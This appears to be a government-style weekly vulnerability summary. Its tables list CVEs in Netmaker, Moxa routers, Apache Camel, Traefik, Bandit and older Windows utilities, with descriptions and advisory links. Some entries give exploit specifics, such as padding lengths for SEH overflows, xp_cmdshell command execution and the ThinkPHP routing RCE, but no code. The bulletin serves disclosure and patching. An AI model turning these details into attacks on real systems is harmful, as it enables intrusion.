| n/a--Netmaker v1.5.0 | An authentication bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key and use it to impersonate any host in the network, gaining access to sensitive information. | 2026-04-28 | not yet calculated | CVE-2026-38651 | https://github.com/gravitl/netmaker/commit/5309aa70d464ef565911369714d661a61481a79b https://www.zyenra.com/blog/netmaker-jwt-verification-bypass https://www.zyenra.com/advisories/netmaker-jwt-verification-bypass |
| Moxa--EDR-8010 Series | An improper ownership management vulnerability has been identified in Moxa's Secure Router. Because of improper ownership management, a low-privileged authenticated user may access a configuration file containing the hashed password of the administrative account. Successful exploitation of this vulnerability could allow an attacker to obtain sensitive information. Exploitation is only possible under a specific condition - when the configuration file has been exported. This vulnerability does not impact the integrity or availability of the affected product, and no confidentiality, integrity, or availability impact to the subsequent system has been identified. | 2026-04-27 | not yet calculated | CVE-2026-3867 | https://www.moxa.com/en/support/product-support/security-advisory/mpsa-261521-cve-2026-3867-cve-2026-3868-improper-ownership-management-and-improper-handling-of-length-parameter-incons |
| Moxa--EDR-8010 Series | An improper handling of the length parameter inconsistency vulnerability has been identified in Moxa's Secure Router. Because of improper validation of length parameters in the HTTPS management interface, an unauthenticated remote attacker could send specially crafted requests that trigger a buffer overflow condition, causing the web service to become unresponsive. Successful exploitation may result in a denial-of-service condition requiring a device reboot to restore normal operation. While successful exploitation can severely impact the availability of the affected device, no impact to the confidentiality or integrity of the affected product has been identified. Additionally, no confidentiality, integrity, or availability impact to the subsequent system has been identified. | 2026-04-27 | not yet calculated | CVE-2026-3868 | https://www.moxa.com/en/support/product-support/security-advisory/mpsa-261521-cve-2026-3867-cve-2026-3868-improper-ownership-management-and-improper-handling-of-length-parameter-incons |
| n/a--diskoverdata v.2.3.5 | Cross Site Request Forgery vulnerability in diskoverdata diskover-community v2.3.5 and before allows a remote attacker to escalate privileges and obtain sensitive information via public/settings_process.php. | 2026-04-27 | not yet calculated | CVE-2026-38934 | http://diskover-community.com http://diskoverdata.com https://github.com/VadlaReddySai/diskoverdata-cve-writeups/blob/main/CVE-2026-38934 |
| n/a--diskoverdata v.2.3.5 | A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/view.php via the doctype parameter. | 2026-04-27 | not yet calculated | CVE-2026-38935 | http://diskover-community.com http://diskoverdata.com https://github.com/VadlaReddySai/diskoverdata-cve-writeups/blob/main/CVE-2026-38935 |
| n/a--diskoverdata v.2.3.5 | A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/selectindices.php via the namecontains parameter. | 2026-04-27 | not yet calculated | CVE-2026-38936 | http://diskover-community.com http://diskoverdata.com https://github.com/VadlaReddySai/diskoverdata-cve-writeups/blob/main/CVE-2026-38936 |
| n/a--mvc-ecommerce v.1.0 | Cross Site Scripting vulnerability in andrewtch88 mvc-ecommerce v1.0 allows a remote attacker to execute arbitrary code and obtain sensitive information via the product_catalogue.php component. | 2026-04-30 | not yet calculated | CVE-2026-38939 | https://gist.github.com/spico8/3b8b64a58069fc189ca28563dd1249e8 |
| n/a--TOKO-ONLINE-ROTI v.1.0 | Cross Site Scripting vulnerability in RafyMrX TOKO-ONLINE-ROTI v1.0 allows a remote attacker to execute arbitrary code via the detail_produk.php component. | 2026-04-30 | not yet calculated | CVE-2026-38940 | https://gist.github.com/spico8/3b8b64a58069fc189ca28563dd1249e8 |
| n/a--FUEL CMS v1.5.2 | Cross-Site Scripting (XSS) vulnerability exists in FUEL CMS v1.5.2 and before within the asset upload functionality. The application fails to properly sanitize uploaded SVG files, allowing a low-privileged authenticated user to upload a crafted SVG file containing malicious code. | 2026-04-28 | not yet calculated | CVE-2026-38948 | https://github.com/daylightstudio/FUEL-CMS https://www.youtube.com/watch?v=lLCF0xbjecQ https://github.com/Chittu13/cve-research/blob/main/CVE-2026-38948/README.md |
| n/a--HTMLy v3.1.1 | Cross-Site Scripting (XSS) vulnerability exists in HTMLy version 3.1.1 in the content creation functionality at the /add/content?type=image endpoint. The application fails to properly sanitize user input, allowing injection of arbitrary code. | 2026-04-28 | not yet calculated | CVE-2026-38949 | https://github.com/danpros/htmly https://youtu.be/3e-tzUMCox8 https://github.com/Chittu13/cve-research/blob/main/CVE-2026-38949/README.md |
| n/a--Cockpit v2.13.5 | Cockpit 2.13.5 and earlier is affected by a misconfiguration within the Bucket component _isFileTypeAllowed function where a specially crafted filename bypasses an extension filter. This allows an authenticated attacker to rename arbitrary files with the .php file extension enabling arbitrary code to be executed on the underlying server. | 2026-04-29 | not yet calculated | CVE-2026-38991 | https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.14.0 https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/ |
| n/a--Cockpit v2.13.5 | Cockpit v2.13.5 and earlier is vulnerable to arbitrary code execution via the filter parameter within multiple endpoints. This vulnerability allows an attacker to run system commands on the underlying infrastructure via the MongoLite $func operator. | 2026-04-29 | not yet calculated | CVE-2026-38992 | https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.14.0 https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/ |
| n/a--Cockpit v2.13.5 | Cockpit 2.13.5 and earlier is vulnerable to directory traversal via the Buckets component. This vulnerability allows authenticated attackers to write files to arbitrary locations within the uploads directory or overwrite assets with malicious versions. | 2026-04-29 | not yet calculated | CVE-2026-38993 | https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.14.0 https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/ |
| FreeBSD--FreeBSD | When exchanging data over a socket, libnv uses select(2) to wait for data to arrive. However, it does not verify whether the provided socket descriptor fits in select(2)'s file descriptor set size limit of FD_SETSIZE (1024). An attacker who is able to force a libnv application to allocate large file descriptors, e.g., by opening many descriptors and executing a program which is not careful to close them upon startup, can trigger stack corruption. If the target application is setuid-root, then this could be used to elevate local privileges. | 2026-04-30 | not yet calculated | CVE-2026-39457 | https://security.freebsd.org/advisories/FreeBSD-SA-26:16.libnv.asc |
| mtrudel--bandit | Allocation of Resources Without Limits or Throttling vulnerability in mtrudel bandit allows unauthenticated remote denial of service via memory exhaustion when WebSocket permessage-deflate compression is enabled. 'Elixir.Bandit.WebSocket.PerMessageDeflate':inflate/2 in lib/bandit/websocket/permessage_deflate.ex calls :zlib.inflate/2 with no output-size cap, then materializes the entire decompressed payload as a single binary via IO.iodata_to_binary/1. The websocket_options.max_frame_size option only bounds the on-the-wire (compressed) frame size, not the decompressed output. A high-ratio compressed frame (e.g. uniform data at ~1024:1 ratio) can stay well under any wire-size limit while forcing GiB-scale heap allocations in the connection process before any application code runs. An unauthenticated attacker who can open a WebSocket connection can send a single such frame to exhaust the BEAM node's memory and trigger an OOM kill. This vulnerability requires both Bandit's server-level websocket_options.compress and the per-upgrade compress: true option passed to WebSockAdapter.upgrade/4 to be enabled. Stock Phoenix and LiveView applications are not affected as they default to compress: false. This issue affects bandit: from 0.5.9 before 1.11.0. | 2026-05-01 | not yet calculated | CVE-2026-39804 | https://github.com/mtrudel/bandit/security/advisories/GHSA-frh3-6pv6-rc8j https://cna.erlef.org/cves/CVE-2026-39804.html https://osv.dev/vulnerability/EEF-CVE-2026-39804 https://github.com/mtrudel/bandit/commit/8156921a51e684a951221da7bc30a70a022f722e |
| mtrudel--bandit | Inconsistent Interpretation of HTTP Requests vulnerability in mtrudel bandit allows HTTP request smuggling via duplicate Content-Length headers. 'Elixir.Bandit.Headers':get_content_length/1 in lib/bandit/headers.ex uses List.keyfind/3, which returns only the first matching header. When a request contains two Content-Length headers with different values, Bandit silently accepts it, uses the first value to read the body, and dispatches the remaining bytes as a second pipelined request on the same keep-alive connection. RFC 9112 §6.3 requires recipients to treat this as an unrecoverable framing error. When Bandit sits behind a proxy that picks the last Content-Length value and forwards the request rather than rejecting it, an unauthenticated attacker can smuggle requests past edge WAF rules, path-based ACLs, rate limiting, and audit logging. This issue affects bandit: before 1.11.0. | 2026-05-01 | not yet calculated | CVE-2026-39805 | https://github.com/mtrudel/bandit/security/advisories/GHSA-c67r-gc9j-2qf7 https://cna.erlef.org/cves/CVE-2026-39805.html https://osv.dev/vulnerability/EEF-CVE-2026-39805 https://github.com/mtrudel/bandit/commit/f2ca636eb6df385219957e8934e9fc6efa1630d1 |
| mtrudel--bandit | Reliance on Untrusted Inputs in a Security Decision vulnerability in mtrudel bandit allows unauthenticated transport-state spoofing on plaintext HTTP connections. 'Elixir.Bandit.Pipeline':determine_scheme/2 in lib/bandit/pipeline.ex returns the client-supplied URI scheme verbatim, ignoring the transport's secure? flag. HTTP/1.1 absolute-form request targets (e.g. GET https://victim/path HTTP/1.1) and the HTTP/2 :scheme pseudo-header are both attacker-controlled strings that flow through this function. Over a plaintext TCP connection, a client can declare https and Bandit will set conn.scheme = :https even though no TLS was negotiated. Downstream Plug consumers that branch on conn.scheme are silently misled: Plug.SSL's already-secure branch skips its HTTP→HTTPS redirect, cookies emitted with secure: true are sent over plaintext, audit logs record requests as having arrived over HTTPS, and CSRF/SameSite gating may make incorrect decisions. This issue affects bandit: from 1.0.0 before 1.11.0. | 2026-05-01 | not yet calculated | CVE-2026-39807 | https://github.com/mtrudel/bandit/security/advisories/GHSA-375f-4r2h-f99j https://cna.erlef.org/cves/CVE-2026-39807.html https://osv.dev/vulnerability/EEF-CVE-2026-39807 https://github.com/mtrudel/bandit/commit/45feea20dea8af7ffd7245271107b695c040e667 |
| traefik--traefik | Traefik is an HTTP reverse proxy and load balancer. Prior to versions 2.11.43, 3.6.14, and 3.7.0-rc.2, there is a high severity authentication bypass vulnerability in Traefik's ForwardAuth and snippet-based authentication middleware. Traefik's forwarded-header sanitization logic targets only canonical header names (e.g., X-Forwarded-Proto) and does not strip or normalize alias variants that use underscores instead of dashes (e.g., X_Forwarded_Proto). These unsanitized alias headers are forwarded intact to the authentication backend. When the backend normalizes underscore and dash header forms equivalently, an attacker can inject spoofed trust context - such as a trusted scheme or host - through the alias headers and bypass authentication on protected routes without valid credentials. This issue has been patched in versions 2.11.43, 3.6.14, and 3.7.0-rc.2. | 2026-04-30 | not yet calculated | CVE-2026-39858 | https://github.com/traefik/traefik/security/advisories/GHSA-5m6w-wvh7-57vm https://github.com/traefik/traefik/releases/tag/v2.11.43 https://github.com/traefik/traefik/releases/tag/v3.6.14 https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.2 |
| Apache Software Foundation--Apache Camel Platform HTTP Main | When authentication is enabled on the Apache Camel embedded HTTP server or embedded management server (camel-platform-http-main) and a non-root context path such as /api or /admin is configured via camel.server.path or camel.management.path, the BasicAuthenticationConfigurer and JWTAuthenticationConfigurer classes derive the authentication path from properties.getPath() when camel.server.authenticationPath / camel.management.authenticationPath is not explicitly set. Combined with the Vert.x sub-router mounting model - the sub-router is mounted at _path_* and the authentication handler is registered inside the sub-router at the resolved path - this causes the authentication handler to match only the exact configured context path, not its subpaths. Unauthenticated requests to subpaths such as /api/_route_ or /admin/observe/info therefore reach protected business routes and management endpoints without being challenged for credentials. The /observe/info endpoint can disclose runtime metadata such as the user, working directory, home directory, process ID, JVM and operating system information. This issue affects Apache Camel: from 4.14.1 before 4.14.6, from 4.18.0 before 4.18.2. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, they are suggested to upgrade to 4.14.6. If users are on the 4.18.x LTS releases stream, they are suggested to upgrade to 4.18.2. | 2026-04-27 | not yet calculated | CVE-2026-40022 | https://camel.apache.org/security/CVE-2026-40022.html |
| Apache Software Foundation--Apache Camel PQC | The Camel-PQC FileBasedKeyLifecycleManager class deserializes the contents of `<keyId>.key` files in the configured key directory using java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. The cast to `java.security.KeyPair` is evaluated only after `readObject()` has already returned, so any `readObject()` side effects in the deserialized object run before the type check. An attacker who can write to the key directory used by a Camel application - for example through a path traversal into the directory, misconfigured filesystem permissions on the volume where keys are stored, a compromised key provisioning pipeline, or a symlink attack - can place a crafted serialized Java object that, when deserialized during normal key lifecycle operations, results in arbitrary code execution in the context of the application. This issue affects Apache Camel: from 4.19.0 before 4.20.0, from 4.18.0 before 4.18.2. Users are recommended to upgrade to version 4.20.0, which fixes the issue by replacing java.io.ObjectInputStream-based key and metadata storage with standard PKCS#8 (private key) / X.509 SubjectPublicKeyInfo (public key) Base64 JSON encoding. For users on the 4.18.x LTS releases stream, upgrade to 4.18.2. | 2026-04-27 | not yet calculated | CVE-2026-40048 | https://camel.apache.org/security/CVE-2026-40048.html |
| helpyio--helpy | Helpy contains a stored cross-site scripting vulnerability in the post author display logic. Any registered user can persist arbitrary HTML in their account name field and cause it to be rendered unescaped in public forum threads where they participate, in the admin ticket view, and in HTML notification emails sent to other users. This issue affects helpy: 2.8.0. | 2026-04-29 | not yet calculated | CVE-2026-40229 | https://fluidattacks.com/es/advisories/offspring https://github.com/helpyio/helpy |
| helpyio--helpy | Helpy contains a stored cross-site scripting vulnerability in the knowledge base Doc rendering logic. An authenticated attacker with admin or agent editor privileges can persist arbitrary HTML or JavaScript in the body field of a knowledge base Doc. This issue affects helpy: 2.8.0. | 2026-04-29 | not yet calculated | CVE-2026-40230 | https://fluidattacks.com/es/advisories/prisioneros https://github.com/helpyio/helpy |
| Apache Software Foundation--Apache Camel JMS | The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy so that case-variant header names such as 'CAmelExecCommandExecutable' are filtered out alongside 'CamelExecCommandExecutable'. The same setLowerCase(true) call was not applied to five non-HTTP HeaderFilterStrategy implementations: JmsHeaderFilterStrategy and ClassicJmsHeaderFilterStrategy in camel-jms, SjmsHeaderFilterStrategy in camel-sjms, CoAPHeaderFilterStrategy in camel-coap, and GooglePubsubHeaderFilterStrategy in camel-google-pubsub. Because those strategies use case-sensitive String.startsWith('Camel'/'camel') filtering while the Camel Exchange stores headers in a case-insensitive map, an attacker with JMS (or equivalent) producer access to the broker consumed by a Camel route can inject case-variant Camel internal headers, which are then resolved by downstream components such as camel-exec and camel-file using their canonical casing. This enables remote code execution and arbitrary file write on routes that forward JMS messages to header-driven components. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2. | 2026-04-27 | not yet calculated | CVE-2026-40453 | https://camel.apache.org/security/CVE-2026-40453.html |
| Apache Software Foundation--Apache Camel Mina | The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter wraps an IoBuffer in a java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. When a Camel route uses camel-mina as a TCP or UDP consumer and requests conversion to ObjectInput (for example via getBody(ObjectInput.class) or @Body ObjectInput), an attacker sending a crafted serialized Java object over the network to the MINA consumer port can trigger arbitrary code execution in the context of the application during readObject(). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2. | 2026-04-27 | not yet calculated | CVE-2026-40473 | https://camel.apache.org/security/CVE-2026-40473.html |
| BinSoft--mpGabinet | mpGabinet is vulnerable to Privilege Escalation due to excessive database privileges assigned to the user used by the application. An attacker with access to any running application instance connected to the backend server can extract database credentials from the application's memory by inspecting the running process. While ability to retrieve credentials from memory is expected behavior, the exposed credentials grant administrative access to the database, exceeding the privileges required for normal application functionality. This allows an attacker to perform actions beyond those permitted through the application interface. This issue affects mpGabinet version 23.12.19 and below. | 2026-04-28 | not yet calculated | CVE-2026-40550 | https://cert.pl/posts/2026/04/CVE-2026-40550/ https://www.mpgabinet.pl/ |
| BinSoft--mpGabinet | mpGabinet performs client-side authentication. An attacker with access to any application instance connected to the backend server can bypass the login verification process by manipulating the application binary and authenticate as an arbitrary user. This issue affects mpGabinet version 23.12.19 and below. | 2026-04-28 | not yet calculated | CVE-2026-40551 | https://cert.pl/posts/2026/04/CVE-2026-40550/ https://www.mpgabinet.pl/ |
| BinSoft--mpGabinet | mpGabinet is vulnerable to Remote Command Execution. An authorized user with access to the application and direct access to the backend database can achieve system command execution by uploading an attachment and modifying its storage path in the database to reference an attacker-controlled remote network resource. Alternatively, it is possible to use a previously uploaded file and change its reference. When the application processes the attachment, and a user tries to open it, the referenced resource is executed by the system. Critically, this vulnerability can be exploited by any unauthenticated attacker by chaining it with CVE-2026-40550 and CVE-2026-40551, which allows obtaining database access, and logging onto any account. This issue affects mpGabinet version 23.12.19 and below. | 2026-04-28 | not yet calculated | CVE-2026-40552 | https://cert.pl/posts/2026/04/CVE-2026-40550/ https://www.mpgabinet.pl/ |
| Apache Software Foundation--Apache Storm Prometheus Reporter | Improper Certificate Validation via Global SSL Context Downgrade in Apache Storm Prometheus Reporter. Versions affected: 2.6.3 through 2.8.6. In production deployments where an administrator enables storm.daemon.metrics.reporter.plugin.prometheus.skip_tls_validation (disabled by default) intending to affect only the Prometheus reporter, an undocumented global side effect creates an attack surface across every TLS-protected communication channel in the Storm daemon. The PrometheusPreparableReporter class implements an INSECURE_TRUST_MANAGER that accepts all certificates without validation (its checkClientTrusted and checkServerTrusted methods are empty). Most critically, when skip_tls_validation is enabled for HTTPS Prometheus PushGateway connections, the INSECURE_CONNECTION_FACTORY calls SSLContext.setDefault(sslContext), which replaces the JVM's default SSL context instead of applying the insecure context only to the Prometheus connection. The setting flows from storm.yaml through PrometheusPreparableReporter.prepare() and INSECURE_CONNECTION_FACTORY to SSLContext.setDefault(), producing a JVM-wide TLS downgrade. All subsequent TLS connections in the process that rely on the default context, including ZooKeeper, Thrift, Netty, and UI connections, silently trust all certificates, including self-signed, expired, and attacker-generated ones, enabling man-in-the-middle interception of cluster state, topology submissions, tuple data, and administrative credentials. Mitigation: 2.x users should upgrade to 2.8.7 if the Prometheus Metrics Reporter is used. Prometheus Metrics Reporter users who cannot upgrade immediately should remove the storm.daemon.metrics.reporter.plugin.prometheus.skip_tls_validation: true setting from their storm.yaml configuration and instead configure a proper truststore containing the PushGateway's certificate. | 2026-04-27 | not yet calculated | CVE-2026-40557 | https://lists.apache.org/thread/f5bv68z1y5xstz22psjk05p3wn86knjq |
| MIYAGAWA--Starman | Starman versions before 0.4018 for Perl allow HTTP request smuggling via improper header precedence. Starman incorrectly gives "Content-Length" priority over "Transfer-Encoding: chunked" when both headers are present in an HTTP request; per RFC 7230 section 3.3.3, Transfer-Encoding must take precedence. An attacker could exploit this to smuggle malicious HTTP requests past a front-end reverse proxy. | 2026-04-28 | not yet calculated | CVE-2026-40560 | https://github.com/miyagawa/Starman/commit/ced205f0805027e9d9c0731f8c40b104220604ed.patch https://metacpan.org/release/MIYAGAWA/Starman-0.4018/changes https://datatracker.ietf.org/doc/html/rfc7230#section-3.3.3 |
| KAZUHO--Starlet | Starlet versions through 0.31 for Perl allow HTTP request smuggling via improper header precedence. Starlet incorrectly gives "Content-Length" priority over "Transfer-Encoding: chunked" when both headers are present in an HTTP request; per RFC 7230 section 3.3.3, Transfer-Encoding must take precedence. An attacker could exploit this to smuggle malicious HTTP requests past a front-end reverse proxy. | 2026-05-03 | not yet calculated | CVE-2026-40561 | https://datatracker.ietf.org/doc/html/rfc7230#section-3.3.3 https://github.com/kazuho/Starlet/commit/a7d5dfd1862aafa43e5eaca0fdb6acf4cc15b2d0.patch |
Vulnerability Summary for the Week of April 20, 2026
Posted on Tuesday April 28, 2026

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Thinkphp--ThinkPHP | ThinkPHP 5.0.23 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary PHP code by invoking functions through the routing parameter. Attackers can craft requests to the index.php endpoint with malicious function parameters to execute system commands with application privileges. | 2026-04-22 | 9.8 | CVE-2018-25270 | ExploitDB-45978 Official Product Homepage Product Reference VulnCheck Advisory: ThinkPHP 5.0.23 Remote Code Execution via invokefunction |
| Elba--ELBA5 | ELBA5 5.8.0 contains a remote code execution vulnerability that allows attackers to obtain database credentials and execute arbitrary commands with SYSTEM level permissions. Attackers can connect to the database using default connector credentials, decrypt the DBA password, and execute commands via the xp_cmdshell stored procedure or add backdoor users to the BEDIENER table. | 2026-04-22 | 9.8 | CVE-2018-25272 | ExploitDB-45905 Official Product Homepage VulnCheck Advisory: ELBA5 5.8.0 Remote Code Execution via Database Access |
| Lizardsystems--Terminal Services Manager | Terminal Services Manager 3.1 contains a stack-based buffer overflow vulnerability in the computer names field that allows local attackers to execute arbitrary code by triggering structured exception handling. Attackers can craft a malicious input file with shellcode and jump instructions that overwrite the SEH handler pointer to execute calc.exe or other payloads when imported through the add computers wizard. | 2026-04-22 | 8.4 | CVE-2018-25259 | ExploitDB-46058 Official Product Homepage VulnCheck Advisory: Terminal Services Manager 3.1 Buffer Overflow SEH |
| Magix--MAGIX Music Editor | MAGIX Music Editor 3.1 contains a buffer overflow vulnerability in the FreeDB Proxy Options dialog that allows local attackers to execute arbitrary code by exploiting structured exception handling. Attackers can craft a malicious payload, paste it into the Server field via the CD menu's FreeDB Proxy Options, and trigger code execution when settings are accepted. | 2026-04-22 | 8.4 | CVE-2018-25260 | ExploitDB-46056 Official Product Homepage Product Reference VulnCheck Advisory: MAGIX Music Editor 3.1 Buffer Overflow via SEH |
| Iperiusbackup--Iperius Backup | Iperius Backup 5.8.1 contains a local buffer overflow vulnerability in the structured exception handling (SEH) mechanism that allows local attackers to execute arbitrary code by supplying a malicious file path. Attackers can create a backup job with a crafted payload in the external file location field that triggers a buffer overflow when the backup job executes, enabling code execution with application privileges. | 2026-04-22 | 8.4 | CVE-2018-25261 | ExploitDB-46059 Official Product Homepage VulnCheck Advisory: Iperius Backup 5.8.1 Local Buffer Overflow SEH |
| faleemi--Faleemi Desktop Software | Faleemi Desktop Software 1.8.2 contains a local buffer overflow vulnerability in the Device alias field that allows local attackers to trigger a structured exception handler (SEH) overwrite. Attackers can craft a malicious payload and paste it into the Device alias field within the Managing Log interface to execute arbitrary code; the published proof of concept launches the calculator. | 2026-04-26 | 8.4 | CVE-2018-25263 | ExploitDB-45492 Product Reference VulnCheck Advisory: Faleemi Desktop Software 1.8.2 Local Buffer Overflow SEH |
| Lizardsystems--LanSpy | LanSpy 2.0.1.159 contains a local buffer overflow vulnerability in the scan section that allows local attackers to execute arbitrary code by exploiting structured exception handling mechanisms. Attackers can craft malicious payloads using egghunter techniques to locate and execute shellcode, triggering code execution through SEH chain manipulation and controlled jumps. | 2026-04-22 | 8.4 | CVE-2018-25265 | ExploitDB-46018 Official Product Homepage VulnCheck Advisory: LanSpy 2.0.1.159 Local Buffer Overflow |
| Lizardsystems--LanSpy | LanSpy 2.0.1.159 contains a local buffer overflow vulnerability that allows attackers to overwrite the instruction pointer by supplying oversized input to the scan field. Attackers can craft a payload with 688 bytes of padding followed by 4 bytes of controlled data to crash the application or potentially achieve code execution. | 2026-04-22 | 8.4 | CVE-2018-25268 | ExploitDB-45968 Official Product Homepage VulnCheck Advisory: LanSpy 2.0.1.159 Local Buffer Overflow via Scan Field |
| Securimport--iSmartViewPro | iSmartViewPro 1.5 contains a structured exception handling (SEH) buffer overflow vulnerability in the 'Save Path for Snapshot and Record file' field that allows local attackers to execute arbitrary code. Attackers can input a crafted payload exceeding 260 bytes through the System Setup interface to overwrite SEH records and execute shellcode with application privileges. | 2026-04-26 | 8.4 | CVE-2018-25283 | ExploitDB-45349 Product Reference VulnCheck Advisory: iSmartViewPro 1.5 Buffer Overflow via SavePath Parameter |
| Cewe-Photoworld--CEWE Photoshow | CEWE Photoshow 6.3.4 contains a buffer overflow vulnerability in the login dialog that allows attackers to crash the application by submitting oversized input. Attackers can inject 4000 bytes of data into the email address and password fields to trigger a denial of service condition. | 2026-04-26 | 7.5 | CVE-2018-25294 | ExploitDB-45211 Official Product Homepage Product Reference VulnCheck Advisory: CEWE Photoshow 6.3.4 Buffer Overflow Denial of Service |
| Fortra--GoAnywhere MFT | The login limit is not enforced on the SFTP service of Fortra's GoAnywhere MFT prior to 7.10.0 when the targeted Web User is configured to log in with an SSH key, leaving the SSH key open to brute-force guessing. | 2026-04-21 | 7.3 | CVE-2025-14362 | https://fortra.com/security/advisories/product-security/FI-2026-002 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Angryip--Angry IP Scanner for Linux | Angry IP Scanner for Linux 3.5.3 contains a denial of service vulnerability that allows local attackers to crash the application by supplying malformed input to the port selection field. Attackers can craft a malicious string containing buffer overflow patterns and paste it into the Preferences Ports tab to trigger an application crash. | 2026-04-22 | 6.2 | CVE-2018-25262 | ExploitDB-46038 Official Product Homepage VulnCheck Advisory: Angry IP Scanner for Linux 3.5.3 Denial of Service |
| Acutesystems--TransMac | TransMac 12.2 contains a buffer overflow vulnerability in the license key input field that allows local attackers to crash the application by submitting an oversized string. Attackers can generate a payload file containing 4000 bytes of data, paste it into the License Key field, and trigger a denial of service condition. | 2026-04-26 | 6.2 | CVE-2018-25264 | ExploitDB-45493 VulnCheck Advisory: TransMac 12.2 Denial of Service via License Key Field |
| Angryip--Angry IP Scanner | Angry IP Scanner 3.5.3 contains a buffer overflow vulnerability in the preferences dialog that allows local attackers to crash the application by supplying an excessively large string. Attackers can generate a file containing a massive buffer of repeated characters and paste it into the unavailable value field in the display preferences to trigger a denial of service. | 2026-04-22 | 6.2 | CVE-2018-25266 | ExploitDB-45993 Official Product Homepage VulnCheck Advisory: Angry IP Scanner 3.5.3 Denial of Service via Preferences Buffer Overflow |
| Ultraiso--UltraISO | UltraISO 9.7.1.3519 contains a local buffer overflow vulnerability in the Output FileName field of the Make CD/DVD Image dialog that allows attackers to overwrite SEH and SE handler records. Attackers can craft a malicious filename string with 304 bytes of data followed by SEH record overwrite values and paste it into the Output FileName field to trigger a denial of service crash. | 2026-04-22 | 6.2 | CVE-2018-25267 | ExploitDB-45996 Official Product Homepage VulnCheck Advisory: UltraISO 9.7.1.3519 Buffer Overflow via Output FileName |
| icewarp--ICEWARP Client | ICEWARP 11.0.0.0 contains a cross-site scripting vulnerability that allows attackers to inject malicious HTML elements into emails by embedding base64-encoded payloads in object and embed tags. Attackers can craft emails containing data URIs with embedded scripts that execute in the client when the email is viewed, compromising user sessions and stealing sensitive information. | 2026-04-22 | 6.1 | CVE-2018-25269 | ExploitDB-45974 Official Product Homepage VulnCheck Advisory: ICEWARP 11.0.0.0 Cross-Site Scripting via Email HTML Injection |
| Textpad--Textpad | Textpad 8.1.2 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long buffer string through the Run command interface. Attackers can paste a 5000-byte payload into the Command field via Tools > Run to trigger a buffer overflow that crashes the application. | 2026-04-22 | 6.2 | CVE-2018-25271 | ExploitDB-45956 Official Product Homepage Product Reference VulnCheck Advisory: Textpad 8.1.2 Denial of Service via Run Command |
| Acutesystems--CrossFont | CrossFont 7.5 contains a buffer overflow vulnerability that allows local attackers to crash the application by submitting an oversized payload in the License Key field. Attackers can generate a malicious file containing 4000 bytes of data, paste it into the License Key input field, and trigger an application crash when processing the input. | 2026-04-26 | 6.2 | CVE-2018-25273 | ExploitDB-45494 VulnCheck Advisory: CrossFont 7.5 Denial of Service via License Key Field |
| infrarecorder--InfraRecorder | InfraRecorder 0.53 contains a denial of service vulnerability that allows local attackers to crash the application by importing a maliciously crafted text file. Attackers can create a text file containing 6000 bytes of data and import it through the Edit menu's Import function to trigger an application crash. | 2026-04-26 | 6.2 | CVE-2018-25274 | ExploitDB-45413 VulnCheck Advisory: InfraRecorder 0.53 Denial of Service via txt File Import |
| faleemi--Faleemi Plus | Faleemi Plus 1.0.2 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying oversized input strings. Attackers can paste a 2000-byte payload into the Camera name and DID number fields during camera addition to trigger an application crash. | 2026-04-26 | 6.2 | CVE-2018-25275 | ExploitDB-45414 Product Reference VulnCheck Advisory: Faleemi Plus 1.0.2 Denial of Service via Buffer Overflow |
| Br-Software--PixGPS | PixGPS 1.1.8 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized string to the folder path input field. Attackers can craft a payload exceeding 6000 bytes and paste it into the 'Folder with picture files' field to trigger a denial of service condition. | 2026-04-26 | 6.2 | CVE-2018-25277 | ExploitDB-45381 Product Reference VulnCheck Advisory: PixGPS 1.1.8 Buffer Overflow Denial of Service |
| Picajet--PicaJet FX | PicaJet FX 2.6.5 contains a denial of service vulnerability that allows local attackers to crash the application by submitting oversized input to registration fields. Attackers can paste a 6000-byte buffer into the Registration Name and Registration Key fields via the Help menu's Register PicaJet dialog to trigger an application crash. | 2026-04-26 | 6.2 | CVE-2018-25278 | ExploitDB-45383 VulnCheck Advisory: PicaJet FX 2.6.5 Denial of Service via Registration Fields |
| Convertimagetotext--jiNa OCR Image to Text | jiNa OCR Image to Text 1.0 contains a denial of service vulnerability that allows local attackers to crash the application by processing a malformed PNG file. Attackers can create a specially crafted PNG file with an oversized buffer and trigger the crash when the application attempts to convert the file to PDF. | 2026-04-26 | 6.2 | CVE-2018-25279 | ExploitDB-45380 Product Reference VulnCheck Advisory: jiNa OCR Image to Text 1.0 Denial of Service via PNG |
